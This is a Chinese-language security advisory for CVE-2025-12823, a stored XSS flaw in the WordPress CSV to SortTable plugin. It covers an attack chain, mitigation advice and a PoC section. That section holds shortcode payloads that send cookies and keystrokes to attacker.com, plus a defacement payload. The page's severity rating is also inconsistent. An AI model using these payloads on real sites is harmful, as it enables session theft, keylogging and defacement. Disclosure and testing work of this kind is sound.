CVE-2025-12823 WordPress CSV to SortTable插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12823

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CSV to SortTable WordPress插件

漏洞概述

CVE-2025-12823是WordPress平台下CSV to SortTable插件的一个高危安全漏洞。该插件用于将CSV数据转换为可排序的表格显示功能，在全球范围内被广泛使用。漏洞根源在于插件对用户通过shortcode方式传入的属性参数缺乏充分的输入验证和输出转义处理。攻击者利用此漏洞可以注入恶意JavaScript代码，这些代码会被永久存储在数据库中。当其他用户访问包含恶意代码的页面时，注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于该漏洞影响所有使用此插件的WordPress网站，攻击面广泛，潜在危害严重。漏洞在2025年11月18日被披露，建议网站管理员立即采取修复措施。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。攻击者通过WordPress的shortcode机制，使用[csv]标签传入恶意构造的属性参数。插件在处理这些参数时，仅进行了简单的字符串拼接操作，直接将用户输入插入到HTML输出流中，而没有进行适当的HTML实体编码或输入验证。例如，攻击者可以构造类似[csv file='test.csv' onload="alert(document.cookie)"]的payload，当页面加载时，onload事件处理器会执行注入的JavaScript代码。由于WordPress的shortcode功能在页面渲染时会被自动解析执行，恶意代码会被写入到数据库中，形成持久化攻击。攻击者需要具备至少Contributor级别的用户权限即可实施攻击，这降低了漏洞利用的门槛。防御的关键是在输出点对所有用户可控数据进行HTML实体编码，使用htmlspecialchars()或esc_html()等函数处理特殊字符。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress版本和CSV to SortTable插件，确认插件版本在4.2或以下

STEP 2

权限获取

攻击者获取WordPress网站的Contributor级别或更高权限账户，可通过社会工程学、密码喷洒或漏洞利用等方式

STEP 3

恶意代码注入

攻击者在页面或文章中插入包含XSS payload的csv shortcode标签，如[csv onload='恶意JS代码']

STEP 4

数据持久化

恶意代码随页面内容被写入WordPress数据库，形成存储型XSS

STEP 5

触发执行

当其他用户（管理员、编辑、其他贡献者）访问包含恶意代码的页面时，浏览器解析执行注入的JavaScript

STEP 6

攻击成功

攻击者通过JavaScript执行窃取会话cookie、劫持用户会话、进行钓鱼攻击或进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress CSV to SortTable Plugin - Stored XSS PoC -->
<!-- Requires Contributor-level access or higher -->

<!-- Basic XSS Payload via csv shortcode -->
[csv file='data.csv' onload='alert(document.cookie)']

<!-- Cookie Theft Payload -->
[csv file='data.csv' onload="fetch('https://attacker.com/steal?c='+document.cookie)"]

<!-- Keylogger Payload -->
[csv file='data.csv' onerror="document.addEventListener('keypress',function(e){fetch('https://attacker.com/log?k='+e.key)})"]

<!-- Session Hijacking Payload -->
[csv file='data.csv' onmouseover="fetch('https://attacker.com/steal?data='+btoa(JSON.stringify({cookie:document.cookie,url:location.href})))"]

<!-- HTML Injection to Defacement -->
[csv file='data.csv' onload='document.body.innerHTML="<h1>Defaced</h1>"']

影响范围

CSV to SortTable WordPress插件 <= 4.2

防御指南

临时缓解措施

在等待官方修复期间，可以采取以下临时缓解措施：1）如果当前不使用CSV to SortTable插件，立即停用并删除；2）限制用户角色权限，禁止低权限用户使用shortcode功能；3）通过.htaccess或Nginx配置添加XSS过滤规则；4）使用WordPress安全插件监控和拦截恶意shortcode；5）考虑使用替代插件实现CSV表格功能；6）加强用户注册审核流程，防止恶意账户创建。建议尽快升级到插件最新版本以彻底修复此漏洞。